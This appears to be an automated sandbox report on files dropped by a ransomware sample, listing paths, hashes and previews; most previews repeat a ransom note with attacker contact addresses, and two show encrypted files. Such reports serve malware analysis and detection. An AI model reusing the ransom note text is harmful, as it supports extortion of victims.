                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.681274694248684
                  Encrypted:false
                  SSDEEP:192:kXRNIXVHqdiEfnz/4pFfChxbnisrSYH5KHgst29ww/60UOLwiudbZ:wsE/cpFKbjugsw9w/Wl8
                  MD5:A92927FE40519BE3851E3752E19ED429
                  SHA1:9381C2D6658236DD66CEFB61F16162A452A550A4
                  SHA-256:998B419B250F12DF9EE5DE143E2127A79DC36D6DA2CB728677397BCCF042A6B6
                  SHA-512:B321072F01CCBCE2D756991078530A348060023ACA43FE2045F1495870DA5B5B69CD729B5A2257EFA709DFB2472D7A982795B135C7E3438FC09A6C7A70BDBE93
                  Malicious:false
                  Preview: ..".Q.i.r..........C1...e...v. .!v`..B/S......6.R.]z.bl.Ra.....'V..?....,....N.4.#[.....S.O;...m...=5)S.Ti.C....\qm..r=....G-...Q2.......6l.6.'.....h..q-We..0{..p........s.{g.rK?Pb.!...O$.....s..TQ`.....C`..Z.Lx..u.*I.......:.d....._.R. .....0.O.!......!T..Q.r(.....>uD........n4.Mw.=X...y..)wto.y.>...(.......}.Ra.> .o........Y.0....s.S.UL.f..Hu..g.z.......U.w..%Q.a..H...~.... .)+..I44..".........I.g..BvbW.....).l![..5Y1V..a.CO..R.....[=Y.....:. .x...LPX3..z...;.c..%.W.. .z...3.K.....x$m..%..............,..b...Y9..P.H..+eV..i.6..$./...s)I..F.....+E...M.$&+...:.0{.'..Q...".......)......E.H..=".....P.r.r..w..}S...t@....ZY[xD....c......)......\C.A.z...&7.G.....-...I..,ZXet..@\..".P.=..CJWl...y.N.70B.]M...|.{...2w.GXY.......}..Q..^P4o.{}y......3.=E....-.F,.>`!...I....dd.&..}x<..).R-.U.P...s..\I..D..E.....X...FZpY/....2..T"........../..r...z!7S.S.. .0Z..u....n.t;..%..Q....Qy.t...Y_.QW.n96.>...N.~?.\""....y..@...WB.ln.=.2VQ~...S...2z..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.683247707848351
                  Encrypted:false
                  SSDEEP:192:moFbamDxLjKY1z9KM380i1f+9gjiPYTPsKVyhmRxBQNB5LHhMz2fqkJNYEzjS:pBD5V7b380i1f0gC0gixunaz2CgN9G
                  MD5:B049849BDEC3A8FF5997B2E9F3C633BC
                  SHA1:EE6F1C53236FB6074B7ACFF999946BC94AC5D5FF
                  SHA-256:D9E2721531BC046A83992FDFE81DD977400CCF47B0BC5DBD4C6E3638A5558854
                  SHA-512:D5A5086DC698220938905B1C3D6C1190F90FA3F6334567BF1B7221DD89D2E4B8019D6945507999FFDF6EEE3FB88C2C4E8C72297920FB05A0398EC5316DD40540
                  Malicious:false
                  Preview: ..g....ljx|.TKp..~....B......>......Y....o..B..y2@.....n..).... .9..l.[....-..}..d.........-S.qe......XI.B..'...!...F..N.[o..:.(.].....R.=....8.XM.....#..z...K|..*;...!7..Kw.).......7.uj._.s<YJ.<9..I.=.%...ZDnU...f.....UE.Z.=......*...](....J%....:.ZP.....w.OeI=.f{.}t.....T.../Si..V.......e..i.O.......j.r.....q}.....J....6e........I.R ...x.......I..?..Y.*x#)7~...f.wg.S.`.........C...d!yp?.....+.!<..,.T..Cc.,..a............@J;..m.O)J..?...03-.Y.U.*@.2..1..'..U..q.b...Z.M'..o........aTf...3.p...F...q.]N.,.X..$.. ......P.....6.\....,.......`l.&3."....K4......;.....x%.$..)...)A.`..e....TPv....C...Cs......b.k.@...eFgj.<...F..o....z.Z....'.B..d..h....).O2wG../.%. ..Y....pia.0....../...R:&...o.U...{..jZ...............L}..~....r.t+.(..KO.............O...d..Ok.e..%.}...... l..\.....2U...(....Yiy.ho.....&f..[....T..r..!).Wlp9.|../v.R....u\..z{.".Cb..E..tFU..L.....!.D..F....... ...*/.(+..n.."..Y.c.p..jD.-yk."Y.k.?x...]......&.g..6....Q.
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
